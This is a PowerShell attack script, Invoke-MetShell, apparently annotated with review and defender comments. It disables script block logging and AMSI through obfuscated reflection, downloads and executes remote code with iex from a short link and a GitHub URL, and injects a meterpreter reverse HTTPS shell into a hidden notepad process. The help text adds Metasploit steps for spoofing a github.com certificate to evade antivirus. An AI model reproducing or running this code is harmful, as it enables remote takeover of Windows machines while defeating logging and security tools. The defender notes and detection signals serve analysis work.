Invoke-MetShell.ps1
function Invoke-MetShell
{
<#
.SYNOPSIS
A wrapper for the well known Invoke-Shellcode. Spawns a hidden Win32 notepad process, checks the
architecture of the current PowerShell session and then spawns a Win32 PowerShell if needed to inject
the shellcode.
.DESCRIPTION
Author: @b4rtik
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER lhost
Address of the handler.
.PARAMETER lport
Port of the handler.
.EXAMPLE
C:\PS> Invoke-MetShell -lhost 192.168.1.5 -lport 443
.NOTES
First of all we need a cert to evade some AV with https.
auxiliary/gather/impersonate_ssl
Module options (auxiliary/gather/impersonate_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
ADD_CN no Add CN to match spoofed site name (e.g. *.example.com)
CA_CERT no CA Public certificate
EXPIRATION no Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
OUT_FORMAT PEM yes Output format (Accepted: DER, PEM)
PRIVKEY no Sign the cert with your own CA private key
PRIVKEY_PASSWORD no Password for private key specified in PRIV_KEY (if applicable)
RHOSTS www.github.com yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
exploit/multi/handler
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.5 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
2 Advanced options must be set
msf5 exploit(multi/handler) > set handlersslcert ./20180929121944_default_192.30.253.112_www.github.com_p_690232.pem
handlersslcert => ./20180929121944_default_192.30.253.112_www.github.com_p_690232.pem
msf5 exploit(multi/handler) > set stagerverifysslcert true
stagerverifysslcert => true
#>
# NOTE(review): despite "Required Dependencies: None" in the help above, both branches below
# download and execute code from the network at run time (see the iex calls), with no pinning
# or integrity check on what is fetched.
[CmdletBinding()]
param (
# NOTE(review): Mandatory = $true makes PowerShell prompt when the value is missing, so the
# default of '127.0.0.1' is never applied; the same holds for the "443" default on $lport.
[Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true)]
[string]
$lhost = '127.0.0.1',
[Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true)]
[ValidateRange( 1,65535 )]
[Int]
$lport = "443"
)
# Injection target: the PID of the hidden SysWOW64 notepad.exe started by Run-Proc (defined below).
# Defender note: the observable chain is powershell.exe starting a notepad.exe with a hidden window,
# after which that notepad.exe is expected to open an outbound connection to $lhost:$lport.
$procId = Run-Proc
# Run-Proc starts a 32-bit notepad, so injection needs a 32-bit host: any session that is not
# already x86 is re-entered through a -RunAs32 background job.
if ($env:Processor_Architecture -ne "x86")
{
write-warning 'Run command in x86 context'
#Use start-job instead of the classic Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe for Symantec evasion
#same reason for shortener url and wrapper to Invoke-....
#AMSI evasion and script block logging by-pass have to be repeated here because the script block will run in a new context
$job = start-job -scriptblock {
# Reflectively replaces the cached Group Policy entry for ScriptBlock logging with a table in which
# EnableScriptBlockLogging and EnableScriptBlockInvocationLogging are both "0", for this job only.
# Defender note: anything logged before this line executes, including the script block that
# contains it, is presumably already in the event log - confirm against the collector.
$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils")."GetFie`ld"("cachedGroupPolicySettings","NonPu"+"blic,Static").GetValue($null);
$settings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Scr'+'iptB'+'lockLo'+'gging'] = @{}
$settings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Scr'+'iptB'+'lockLo'+'gging'].Add('EnableScr'+'iptBlockLogging',"0")
$settings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Scr'+'iptB'+'lockLo'+'gging'].Add('EnableScri'+'ptBlockInvoca'+'tionLogging',"0")
# Replaces the private static ScriptBlock.signatures set with an empty HashSet via reflection.
[Ref].Assembly.GetType("System.Management.Automation.ScriptBlock")."GetFie`ld"("signatures","NonPub"+"lic,static").SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]'))
# Sets AmsiUtils.amsiInitFailed to $true via reflection. The type, field and policy names on these
# lines are assembled from string fragments at run time, so a detection that expects the assembled
# names to appear literally in the script text will miss this; the reflective access to these
# internals and the behaviour that follows (hidden notepad.exe with an outbound HTTPS connection)
# are the durable signals.
[Ref].Assembly.GetType('System.M'+'ana'+'gement.Automation.A'+'msi'+'Uti'+'ls')."GetFie`ld"('ams'+'iIni'+'tFa'+'iled','NonPublic,Static').SetValue($null,$true);
# Downloads and executes whatever the goo.gl short link resolves to at run time, with no integrity
# check; the link target is outside this repository's control.
iex((New-Object system.net.webclient).DownloadString('https://goo.gl/ks6EMR'));
# Invoke-Mycode is not defined in this file; presumably it comes from the script fetched above.
# $args: [0] target PID, [1] handler address, [2] handler port (see -ArgumentList below).
Invoke-Mycode -ProcessId $args[0] -Lhost $args[1] -Lport $args[2];
} -ArgumentList @($procId, $lhost, $lport) -RunAs32
# NOTE(review): $job is never waited on or inspected, so a failure inside the job is silent.
}
else
{
# Already x86: fetch Invoke-Shellcode from the master branch (unpinned, no hash check) and inject a
# meterpreter reverse_https stager into the notepad process started above.
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/b4rtik/PowerTheShell/master/Scripts/Invoke-ShellCode.ps1'))
Invoke-Shellcode -ProcessId $procId -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Verbose -Force
}
}
function Run-Proc
{
# Starts a hidden 32-bit notepad.exe (SysWOW64 path) to serve as the injection target and returns
# its process id.
# Defender note: a notepad.exe child of powershell.exe created with WindowStyle Hidden and
# CreateNoWindow set, with no user interaction, is the process-creation signal for this tool.
# NOTE(review): Process.Start presumably throws if the path does not exist; nothing here handles
# that, so the caller's $procId would be unset.
$startinfo = New-Object System.Diagnostics.ProcessStartInfo
$startinfo.FileName = "C:\Windows\SysWOW64\notepad.exe"
$startinfo.WindowStyle = 'Hidden'
$startinfo.CreateNoWindow = $True
$Proc = [Diagnostics.Process]::Start($startinfo)
return $Proc.id
}